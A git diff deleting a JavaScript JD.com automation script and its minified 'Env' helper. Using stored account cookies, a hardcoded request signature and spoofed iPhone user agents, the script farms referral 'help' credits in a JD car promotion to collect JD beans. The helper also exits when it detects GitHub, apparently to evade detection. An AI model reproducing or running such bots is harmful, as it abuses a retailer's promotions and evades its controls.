e.toString().match(/[^.[\]]+/g) || []), e.slice(0, -1).reduce((t, s, i) => Object(t[s]) === t[s] ? t[s] : t[s] = Math.abs(e[i + 1]) >> 0 == +e[i + 1] ? [] : { }, t)[e[e.length - 1]] = s, t) } getdata(t) { let e = this.getval(t); if (/^@/.test(t)) { const [, s, i] = /^@(.*?)\.(.*?)$/.exec(t), r = s ? this.getval(s) : ""; if (r) try { const t = JSON.parse(r); e = t ? this.lodash_get(t, i, "") : e } catch (t) { e = "" } } return e } setdata(t, e) { let s = !1; if (/^@/.test(e)) { const [, i, r] = /^@(.*?)\.(.*?)$/.exec(e), o = this.getval(i), h = i ? "null" === o ? null : o || "{}" : "{}"; try { const e = JSON.parse(h); this.lodash_set(e, r, t), s = this.setval(JSON.stringify(e), i) } catch (e) { const o = { }; this.lodash_set(o, r, t), s = this.setval(JSON.stringify(o), i) } } else s = this.setval(t, e); return s } getval(t) { return this.isSurge() || this.isLoon() ? $persistentStore.read(t) : this.isQuanX() ? $prefs.valueForKey(t) : this.isNode() ? (this.data = this.loaddata(), this.data[t]) : this.data && this.data[t] || null } setval(t, e) { return this.isSurge() || this.isLoon() ? $persistentStore.write(t, e) : this.isQuanX() ? $prefs.setValueForKey(t, e) : this.isNode() ? (this.data = this.loaddata(), this.data[e] = t, this.writedata(), !0) : this.data && this.data[e] || null } initGotEnv(t) { this.got = this.got ? this.got : require("got"), this.cktough = this.cktough ? this.cktough : require("tough-cookie"), this.ckjar = this.ckjar ? this.ckjar : new this.cktough.CookieJar, t && (t.headers = t.headers ? t.headers : { }, void 0 === t.headers.Cookie && void 0 === t.cookieJar && (t.cookieJar = this.ckjar)) } get(t, e = (() => { })) { t.headers && (delete t.headers["Content-Type"], delete t.headers["Content-Length"]), this.isSurge() || this.isLoon() ? (this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || { }, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.get(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) })) : this.isQuanX() ? (this.isNeedRewrite && (t.opts = t.opts || { }, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t))) : this.isNode() && (this.initGotEnv(t), this.got(t).on("redirect", (t, e) => { try { if (t.headers["set-cookie"]) { const s = t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString(); s && this.ckjar.setCookieSync(s, null), e.cookieJar = this.ckjar } } catch (t) { this.logErr(t) } }).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) })) } post(t, e = (() => { })) { if (t.body && t.headers && !t.headers["Content-Type"] && (t.headers["Content-Type"] = "application/x-www-form-urlencoded"), t.headers && delete t.headers["Content-Length"], this.isSurge() || this.isLoon()) this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || { }, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.post(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) }); else if (this.isQuanX()) t.method = "POST", this.isNeedRewrite && (t.opts = t.opts || { }, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t)); else if (this.isNode()) { this.initGotEnv(t); const { url: s, ...i } = t; this.got.post(s, i).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) }) } } time(t, e = null) { const s = e ? new Date(e) : new Date; let i = { "M+": s.getMonth() + 1, "d+": s.getDate(), "H+": s.getHours(), "m+": s.getMinutes(), "s+": s.getSeconds(), "q+": Math.floor((s.getMonth() + 3) / 3), S: s.getMilliseconds() }; /(y+)/.test(t) && (t = t.replace(RegExp.$1, (s.getFullYear() + "").substr(4 - RegExp.$1.length))); for (let e in i) new RegExp("(" + e + ")").test(t) && (t = t.replace(RegExp.$1, 1 == RegExp.$1.length ? i[e] : ("00" + i[e]).substr(("" + i[e]).length))); return t } msg(e = t, s = "", i = "", r) { const o = t => { if (!t) return t; if ("string" == typeof t) return this.isLoon() ? t : this.isQuanX() ? { "open-url": t } : this.isSurge() ? { url: t } : void 0; if ("object" == typeof t) { if (this.isLoon()) { let e = t.openUrl || t.url || t["open-url"], s = t.mediaUrl || t["media-url"]; return { openUrl: e, mediaUrl: s } } if (this.isQuanX()) { let e = t["open-url"] || t.url || t.openUrl, s = t["media-url"] || t.mediaUrl; return { "open-url": e, "media-url": s } } if (this.isSurge()) { let e = t.url || t.openUrl || t["open-url"]; return { url: e } } } }; if (this.isMute || (this.isSurge() || this.isLoon() ? $notification.post(e, s, i, o(r)) : this.isQuanX() && $notify(e, s, i, o(r))), !this.isMuteLog) { let t = ["", "==============📣系统通知📣=============="]; t.push(e), s && t.push(s), i && t.push(i), console.log(t.join("\n")), this.logs = this.logs.concat(t) } } log(...t) { t.length > 0 && (this.logs = [...this.logs, ...t]), console.log(t.join(this.logSeparator)) } logErr(t, e) { const s = !this.isSurge() && !this.isQuanX() && !this.isLoon(); s ? this.log("", `❗️${this.name}, 错误!`, t.stack) : this.log("", `❗️${this.name}, 错误!`, t) } wait(t) { return new Promise(e => setTimeout(e, t)) } done(t = { }) { const e = (new Date).getTime(), s = (e - this.startTime) / 1e3; this.log("", `🔔${this.name}, 结束! 🕛 ${s} 秒`), this.log(), (this.isSurge() || this.isQuanX() || this.isLoon()) && $done(t) } }(t, e) } diff --git a/jd_mpdzcar_help.js b/jd_mpdzcar_help.js deleted file mode 100644 index 1aecc03..0000000 --- a/jd_mpdzcar_help.js +++ /dev/null @@ -1,338 +0,0 @@ -/* -TG https://t.me/duckjobs - -活动入口:京东汽车 - 右下角 - 领京豆 -纯助力,无内置,ck1不能黑号,不要问为什么分开😂 - -新人助力10,老用户5 - -10 3 * * * jd_mpdzcar.js -*/ -const $ = new Env('头文字J 助力'); -const jdCookieNode = $.isNode() ? require('./jdCookie.js') : ''; -const notify = $.isNode() ? require('./sendNotify') : ''; -let cookiesArr = [], cookie = '', message = ''; -let ownCode = null; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]) - }) - if (process.env.JD_DEBUG && process.env.JD_DEBUG === 'false') console.log = () => { }; -} else { - let cookiesData = $.getdata('CookiesJD') || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map(item => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata('CookieJD2'), $.getdata('CookieJD')]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter(item => !!item); -} -!(async () => { - if (!cookiesArr[0]) { - $.msg($.name, '【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取', 'https://bean.m.jd.com/bean/signIndex.action', { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - for (let i = 0; i < cookiesArr.length; i++) { - if (cookiesArr[i]) { - cookie = cookiesArr[i] - originCookie = cookiesArr[i] - newCookie = '' - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]) - $.index = i + 1; - $.isLogin = true; - $.nickName = ''; - await checkCookie(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - if ($.isNode()) { - await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - } - continue - } - authorCodeList = [ - '', - ] - $.bean = 0; - $.ADID = getUUID('xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 1); - $.UUID = getUUID('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'); - $.authorCode = ownCode ? ownCode : authorCodeList[random(0, authorCodeList.length)] - $.authorNum = `${random(1000000, 9999999)}` - $.activityId = '1760007' - // $.activityShopId = '1760001' - $.activityUrl = `https://mpdz-car-dz.isvjcloud.com/h5/?lng=00.000000&lat=00.000000&sid=&un_area=` - await mpdzCar() - if ($.bean > 0) { - message += `\n【京东账号${$.index}】${$.nickName || $.UserName} \n └ 获得 ${$.bean} 京豆。` - } - } - } - if (message !== '') { - if ($.isNode()) { - await notify.sendNotify($.name, message, '', `\n`); - } else { - $.msg($.name, '有点儿收获', message); - } - } -})() - .catch((e) => { - $.log('', `❌ ${$.name}, 失败! 原因: ${e}!`, '') - }) - .finally(() => { - $.done(); - }) - - -async function mpdzCar() { - $.token = null; - $.buyerNick = null; - await getToken(); - if ($.token) { - await task('/ql/front/getFansInfo', { - "data": $.token, - "source": "01", - }) - // console.log($.buyerNick) - if ($.buyerNick) { - - await task('/ql/front/loadUnitedCardActivityInfo', { - buyerNick: $.buyerNick - }) - console.log('去助力 '+$.authorCode); - await task('/ql/front/participantBehavior', { - buyerNick: $.buyerNick, - inviterNick: $.authorCode, - "behavior": "inviteHelp", - }) - } else { - console.log("can't got buyerNick"); - } - } else { - console.log("can't got token"); - } -} - -function task(function_id, body, isCommon = 0) { - let comBody = { - actId: $.activityId, - // method: function_id, - // "userId": "" - } - Object.assign(body, comBody) - return new Promise(resolve => { - $.post(taskUrl(function_id, body, isCommon), async (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.succ) { - switch (function_id) { - case '/ql/front/getFansInfo': - $.buyerNick = data.msg - if ($.index === 1) { - ownCode = $.buyerNick - console.log("助力码 "+ownCode) - } - break; - case '/ql/front/loadUnitedCardActivityInfo': - $.activityContent = data.data - break; - case '/ql/front/loadShopGroup': - $.shopList = data.data - break; - case '/ql/front/loadAssociationState': - $.associationState = data.data; - break; - case '/ql/front/participantBehavior': - console.log(data.msg); - if (data.data && data.data.awardName) { - console.log('mission completed,awarded:' + data.data.awardName); - } - break; - case '/ql/front/carPlayUpdate': - console.log(data) - break; - case '/ql/front/exchangeMarket': - console.log(data) - break; - } - } else { - console.log(data.errorMsg); - } - } else { - $.log("京东没有返回数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function bindWithVender(venderId, channel = 401) { - let opt = { - url: `https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=bindWithVender&body=${encodeURIComponent(JSON.stringify({ "venderId": venderId, "bindByVerifyCodeFlag": 1, "registerExtend": { }, "writeChildFlag": 0, "channel": channel }))}&client=H5&clientVersion=9.2.0&uuid=88888`, - headers: { - Host: 'api.m.jd.com', - Accept: '*/*', - Connection: 'keep-alive', - Cookie: cookie, - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - 'Accept-Language': 'zh-cn', - Referer: `https://shopmember.m.jd.com/shopcard/?venderId=${venderId}}&channel=401&returnUrl=${encodeURIComponent($.activityUrl)}`, - 'Accept-Encoding': 'gzip, deflate, br' - } - } - return new Promise(resolve => { - $.get(opt, (err, resp, data) => { - try { - if (err) { - console.log(err) - } else { - res = JSON.parse(data) - if (res.success) { - if (res.result && res.result.giftInfo) { - if (res.result.giftInfo.giftList) { - for (const vo of res.result.giftInfo.giftList) { - $.log(vo.name) - if (vo.prizeType === 4) { - $.log(`==>获得【${vo.quantity}】京豆`) - $.bean += vo.quantity - } - } - } - - } - } - } - } catch (error) { - console.log(error) - } finally { - resolve(); - } - }) - - }) -} -function taskUrl(function_id, body, isCommon) { - return { - url: isCommon ? `https://mpdz-car-dz.isvjcloud.com/${function_id}` : `https://mpdz-car-dz.isvjcloud.com${function_id}`, - headers: { - Host: 'mpdz-car-dz.isvjcloud.com', - Accept: 'application/json', - 'X-Requested-With': 'XMLHttpRequest', - 'Accept-Language': 'zh-cn', - 'Accept-Encoding': 'gzip, deflate, br', - 'Content-Type': 'application/json; charset=UTF-8', - Origin: 'https://mpdz-car-dz.isvjcloud.comm', - 'User-Agent': `jdapp;iPhone;9.5.4;13.6;${$.UUID};network/wifi;ADID/${$.ADID};model/iPhone10,3;addressid/0;appBuild/167668;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`, - Connection: 'keep-alive', - Referer: $.activityUrl - }, - body: JSON.stringify(body) - - } -} - -function getToken() { - let opt = { - url: `https://api.m.jd.com/client.action?functionId=isvObfuscator`, - headers: { - Host: 'api.m.jd.com', - 'Content-Type': 'application/x-www-form-urlencoded', - Accept: '*/*', - Connection: 'keep-alive', - Cookie: cookie, - 'User-Agent': 'JD4iPhone/167650 (iPhone; iOS 13.7; Scale/3.00)', - 'Accept-Language': 'zh-Hans-CN;q=1', - 'Accept-Encoding': 'gzip, deflate, br', - }, - body: `body=%7B%22url%22%3A%20%22https%3A//lzdz1-isv.isvjcloud.com%22%2C%20%22id%22%3A%20%22%22%7D&uuid=72124265217d48b7955781024d65bbc4&client=apple&clientVersion=9.4.0&st=1621796702000&sv=120&sign=14f7faa31356c74e9f4289972db4b988` - } - return new Promise(resolve => { - $.post(opt, (err, resp, data) => { - try { - if (err) { - $.log(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.code === "0") { - $.token = data.token - } - } else { - $.log("京东返回了空数据") - } - } - } catch (error) { - $.log(error) - } finally { - resolve(); - } - }) - }) -} -function random(min, max) { - - return Math.floor(Math.random() * (max - min)) + min; - -} -function getUUID(format = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', UpperCase = 0) { - return format.replace(/[xy]/g, function (c) { - var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); - if (UpperCase) { - uuid = v.toString(36).toUpperCase(); - } else { - uuid = v.toString(36) - } - return uuid; - }); -} -function checkCookie() { - const options = { - url: "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion", - headers: { - "Host": "me-api.jd.com", - "Accept": "*/*", - "Connection": "keep-alive", - "Cookie": cookie, - "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1", - "Accept-Language": "zh-cn", - "Referer": "https://home.m.jd.com/myJd/newhome.action?sceneval=2&ufc=&", - "Accept-Encoding": "gzip, deflate, br", - } - }; - return new Promise(resolve => { - $.get(options, (err, resp, data) => { - try { - if (err) { - $.logErr(err) - } else { - if (data) { - data = JSON.parse(data); - if (data.retcode === "1001") { - $.isLogin = false; //cookie过期 - return; - } - if (data.retcode === "0" && data.data.hasOwnProperty("userInfo")) { - $.nickName = data.data.userInfo.baseInfo.nickname; - } - } else { - $.log('京东返回了空数据'); - } - } - } catch (e) { - $.logErr(e) - } finally { - resolve(); - } - }) - }) -} -// prettier-ignore -!function (n) { "use strict"; function t(n, t) { var r = (65535 & n) + (65535 & t); return (n >> 16) + (t >> 16) + (r >> 16) << 16 | 65535 & r } function r(n, t) { return n << t | n >>> 32 - t } function e(n, e, o, u, c, f) { return t(r(t(t(e, n), t(u, f)), c), o) } function o(n, t, r, o, u, c, f) { return e(t & r | ~t & o, n, t, u, c, f) } function u(n, t, r, o, u, c, f) { return e(t & o | r & ~o, n, t, u, c, f) } function c(n, t, r, o, u, c, f) { return e(t ^ r ^ o, n, t, u, c, f) } function f(n, t, r, o, u, c, f) { return e(r ^ (t | ~o), n, t, u, c, f) } function i(n, r) { n[r >> 5] |= 128 << r % 32, n[14 + (r + 64 >>> 9 << 4)] = r; var e, i, a, d, h, l = 1732584193, g = -271733879, v = -1732584194, m = 271733878; for (e = 0; e < n.length; e += 16)i = l, a = g, d = v, h = m, g = f(g = f(g = f(g = f(g = c(g = c(g = c(g = c(g = u(g = u(g = u(g = u(g = o(g = o(g = o(g = o(g, v = o(v, m = o(m, l = o(l, g, v, m, n[e], 7, -680876936), g, v, n[e + 1], 12, -389564586), l, g, n[e + 2], 17, 606105819), m, l, n[e + 3], 22, -1044525330), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 4], 7, -176418897), g, v, n[e + 5], 12, 1200080426), l, g, n[e + 6], 17, -1473231341), m, l, n[e + 7], 22, -45705983), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 8], 7, 1770035416), g, v, n[e + 9], 12, -1958414417), l, g, n[e + 10], 17, -42063), m, l, n[e + 11], 22, -1990404162), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 12], 7, 1804603682), g, v, n[e + 13], 12, -40341101), l, g, n[e + 14], 17, -1502002290), m, l, n[e + 15], 22, 1236535329), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 1], 5, -165796510), g, v, n[e + 6], 9, -1069501632), l, g, n[e + 11], 14, 643717713), m, l, n[e], 20, -373897302), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 5], 5, -701558691), g, v, n[e + 10], 9, 38016083), l, g, n[e + 15], 14, -660478335), m, l, n[e + 4], 20, -405537848), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 9], 5, 568446438), g, v, n[e + 14], 9, -1019803690), l, g, n[e + 3], 14, -187363961), m, l, n[e + 8], 20, 1163531501), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 13], 5, -1444681467), g, v, n[e + 2], 9, -51403784), l, g, n[e + 7], 14, 1735328473), m, l, n[e + 12], 20, -1926607734), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 5], 4, -378558), g, v, n[e + 8], 11, -2022574463), l, g, n[e + 11], 16, 1839030562), m, l, n[e + 14], 23, -35309556), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 1], 4, -1530992060), g, v, n[e + 4], 11, 1272893353), l, g, n[e + 7], 16, -155497632), m, l, n[e + 10], 23, -1094730640), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 13], 4, 681279174), g, v, n[e], 11, -358537222), l, g, n[e + 3], 16, -722521979), m, l, n[e + 6], 23, 76029189), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 9], 4, -640364487), g, v, n[e + 12], 11, -421815835), l, g, n[e + 15], 16, 530742520), m, l, n[e + 2], 23, -995338651), v = f(v, m = f(m, l = f(l, g, v, m, n[e], 6, -198630844), g, v, n[e + 7], 10, 1126891415), l, g, n[e + 14], 15, -1416354905), m, l, n[e + 5], 21, -57434055), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 12], 6, 1700485571), g, v, n[e + 3], 10, -1894986606), l, g, n[e + 10], 15, -1051523), m, l, n[e + 1], 21, -2054922799), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 8], 6, 1873313359), g, v, n[e + 15], 10, -30611744), l, g, n[e + 6], 15, -1560198380), m, l, n[e + 13], 21, 1309151649), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 4], 6, -145523070), g, v, n[e + 11], 10, -1120210379), l, g, n[e + 2], 15, 718787259), m, l, n[e + 9], 21, -343485551), l = t(l, i), g = t(g, a), v = t(v, d), m = t(m, h); return [l, g, v, m] } function a(n) { var t, r = "", e = 32 * n.length; for (t = 0; t < e; t += 8)r += String.fromCharCode(n[t >> 5] >>> t % 32 & 255); return r } function d(n) { var t, r = []; for (r[(n.length >> 2) - 1] = void 0, t = 0; t < r.length; t += 1)r[t] = 0; var e = 8 * n.length; for (t = 0; t < e; t += 8)r[t >> 5] |= (255 & n.charCodeAt(t / 8)) << t % 32; return r } function h(n) { return a(i(d(n), 8 * n.length)) } function l(n, t) { var r, e, o = d(n), u = [], c = []; for (u[15] = c[15] = void 0, o.length > 16 && (o = i(o, 8 * n.length)), r = 0; r < 16; r += 1)u[r] = 909522486 ^ o[r], c[r] = 1549556828 ^ o[r]; return e = i(u.concat(d(t)), 512 + 8 * t.length), a(i(c.concat(e), 640)) } function g(n) { var t, r, e = ""; for (r = 0; r < n.length; r += 1)t = n.charCodeAt(r), e += "0123456789abcdef".charAt(t >>> 4 & 15) + "0123456789abcdef".charAt(15 & t); return e } function v(n) { return unescape(encodeURIComponent(n)) } function m(n) { return h(v(n)) } function p(n) { return g(m(n)) } function s(n, t) { return l(v(n), v(t)) } function C(n, t) { return g(s(n, t)) } function A(n, t, r) { return t ? r ? s(t, n) : C(t, n) : r ? m(n) : p(n) } $.md5 = A }(this); -function Env(t, e) { "undefined" != typeof process && JSON.stringify(process.env).indexOf("GITHUB") > -1 && process.exit(0); class s { constructor(t) { this.env = t } send(t, e = "GET") { t = "string" == typeof t ? { url: t } : t; let s = this.get; return "POST" === e && (s = this.post), new Promise((e, i) => { s.call(this, t, (t, s, r) => { t ? i(t) : e(s) }) }) } get(t) { return this.send.call(this.env, t) } post(t) { return this.send.call(this.env, t, "POST") } } return new class { constructor(t, e) { this.name = t, this.http = new s(this), this.data = null, this.dataFile = "box.dat", this.logs = [], this.isMute = !1, this.isNeedRewrite = !1, this.logSeparator = "\n", this.startTime = (new Date).getTime(), Object.assign(this, e), this.log("", `🔔${this.name}, 开始!`) } isNode() { return "undefined" != typeof module && !!module.exports } isQuanX() { return "undefined" != typeof $task } isSurge() { return "undefined" != typeof $httpClient && "undefined" == typeof $loon } isLoon() { return "undefined" != typeof $loon } toObj(t, e = null) { try { return JSON.parse(t) } catch { return e } } toStr(t, e = null) { try { return JSON.stringify(t) } catch { return e } } getjson(t, e) { let s = e; const i = this.getdata(t); if (i) try { s = JSON.parse(this.getdata(t)) } catch { } return s } setjson(t, e) { try { return this.setdata(JSON.stringify(t), e) } catch { return !1 } } getScript(t) { return new Promise(e => { this.get({ url: t }, (t, s, i) => e(i)) }) } runScript(t, e) { return new Promise(s => { let i = this.getdata("@chavy_boxjs_userCfgs.httpapi"); i = i ? i.replace(/\n/g, "").trim() : i; let r = this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout"); r = r ? 1 * r : 20, r = e && e.timeout ? e.timeout : r; const [o, h] = i.split("@"), n = { url: `http://${h}/v1/scripting/evaluate`, body: { script_text: t, mock_type: "cron", timeout: r }, headers: { "X-Key": o, Accept: "*/*" } }; this.post(n, (t, e, i) => s(i)) }).catch(t => this.logErr(t)) } loaddata() { if (!this.isNode()) return { }; { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e); if (!s && !i) return { }; { const i = s ? t : e; try { return JSON.parse(this.fs.readFileSync(i)) } catch (t) { return { } } } } } writedata() { if (this.isNode()) { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e), r = JSON.stringify(this.data); s ? this.fs.writeFileSync(t, r) : i ? this.fs.writeFileSync(e, r) : this.fs.writeFileSync(t, r) } } lodash_get(t, e, s) { const i = e.replace(/\[(\d+)\]/g, ".$1").split("."); let r = t; for (const t of i) if (r = Object(r)[t], void 0 === r) return s; return r } lodash_set(t, e, s) { return Object(t) !== t ? t : (Array.isArray(e) || (e = e.toString().match(/[^.[\]]+/g) || []), e.slice(0, -1).reduce((t, s, i) => Object(t[s]) === t[s] ? t[s] : t[s] = Math.abs(e[i + 1]) >> 0 == +e[i + 1] ? [] : { }, t)[e[e.length - 1]] = s, t) } getdata(t) { let e = this.getval(t); if (/^@/.test(t)) { const [, s, i] = /^@(.*?)\.(.*?)$/.exec(t), r = s ? this.getval(s) : ""; if (r) try { const t = JSON.parse(r); e = t ? this.lodash_get(t, i, "") : e } catch (t) { e = "" } } return e } setdata(t, e) { let s = !1; if (/^@/.test(e)) { const [, i, r] = /^@(.*?)\.(.*?)$/.exec(e), o = this.getval(i), h = i ? "null" === o ? null : o || "{}" : "{}"; try { const e = JSON.parse(h); this.lodash_set(e, r, t), s = this.setval(JSON.stringify(e), i) } catch (e) { const o = { }; this.lodash_set(o, r, t), s = this.setval(JSON.stringify(o), i) } } else s = this.setval(t, e); return s } getval(t) { return this.isSurge() || this.isLoon() ? $persistentStore.read(t) : this.isQuanX() ? $prefs.valueForKey(t) : this.isNode() ? (this.data = this.loaddata(), this.data[t]) : this.data && this.data[t] || null } setval(t, e) { return this.isSurge() || this.isLoon() ? $persistentStore.write(t, e) : this.isQuanX() ? $prefs.setValueForKey(t, e) : this.isNode() ? (this.data = this.loaddata(), this.data[e] = t, this.writedata(), !0) : this.data && this.data[e] || null } initGotEnv(t) { this.got = this.got ? this.got : require("got"), this.cktough = this.cktough ? this.cktough : require("tough-cookie"), this.ckjar = this.ckjar ? this.ckjar : new this.cktough.CookieJar, t && (t.headers = t.headers ? t.headers : { }, void 0 === t.headers.Cookie && void 0 === t.cookieJar && (t.cookieJar = this.ckjar)) } get(t, e = (() => { })) { t.headers && (delete t.headers["Content-Type"], delete t.headers["Content-Length"]), this.isSurge() || this.isLoon() ? (this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || { }, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.get(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) })) : this.isQuanX() ? (this.isNeedRewrite && (t.opts = t.opts || { }, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t))) : this.isNode() && (this.initGotEnv(t), this.got(t).on("redirect", (t, e) => { try { if (t.headers["set-cookie"]) { const s = t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString(); s && this.ckjar.setCookieSync(s, null), e.cookieJar = this.ckjar } } catch (t) { this.logErr(t) } }).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) })) } post(t, e = (() => { })) { if (t.body && t.headers && !t.headers["Content-Type"] && (t.headers["Content-Type"] = "application/x-www-form-urlencoded"), t.headers && delete t.headers["Content-Length"], this.isSurge() || this.isLoon()) this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || { }, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.post(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) }); else if (this.isQuanX()) t.method = "POST", this.isNeedRewrite && (t.opts = t.opts || { }, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t)); else if (this.isNode()) { this.initGotEnv(t); const { url: s, ...i } = t; this.got.post(s, i).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) }) } } time(t, e = null) { const s = e ? new Date(e) : new Date; let i = { "M+": s.getMonth() + 1, "d+": s.getDate(), "H+": s.getHours(), "m+": s.getMinutes(), "s+": s.getSeconds(), "q+": Math.floor((s.getMonth() + 3) / 3), S: s.getMilliseconds() }; /(y+)/.test(t) && (t = t.replace(RegExp.$1, (s.getFullYear() + "").substr(4 - RegExp.$1.length))); for (let e in i) new RegExp("(" + e + ")").test(t) && (t = t.replace(RegExp.$1, 1 == RegExp.$1.length ? i[e] : ("00" + i[e]).substr(("" + i[e]).length))); return t } msg(e = t, s = "", i = "", r) { const o = t => { if (!t) return t; if ("string" == typeof t) return this.isLoon() ? t : this.isQuanX() ? { "open-url": t } : this.isSurge() ? { url: t } : void 0; if ("object" == typeof t) { if (this.isLoon()) { let e = t.openUrl || t.url || t["open-url"], s = t.mediaUrl || t["media-url"]; return { openUrl: e, mediaUrl: s } } if (this.isQuanX()) { let e = t["open-url"] || t.url || t.openUrl, s = t["media-url"] || t.mediaUrl; return { "open-url": e, "media-url": s } } if (this.isSurge()) { let e = t.url || t.openUrl || t["open-url"]; return { url: e } } } }; if (this.isMute || (this.isSurge() || this.isLoon() ? $notification.post(e, s, i, o(r)) : this.isQuanX() && $notify(e, s, i, o(r))), !this.isMuteLog) { let t = ["", "==============📣系统通知📣=============="]; t.push(e), s && t.push(s), i && t.push(i), console.log(t.join("\n")), this.logs = this.logs.concat(t) } } log(...t) { t.length > 0 && (this.logs = [...this.logs, ...t]), console.log(t.join(this.logSeparator)) } logErr(t, e) { const s = !this.isSurge() && !this.isQuanX() && !this.isLoon(); s ? this.log("", `❗️${this.name}, 错误!`, t.stack) : this.log("", `❗️${this.name}, 错误!`, t) } wait(t) { return new Promise(e => setTimeout(e, t)) } done(t = { }) { const e = (new Date).getTime(), s = (e - this.startTime) / 1e3; this.log("", `🔔${this.name}, 结束! 🕛 ${s} 秒`), this.log(), (this.isSurge() || this.isQuanX() || this.isLoon()) && $done(t) } }(t, e) }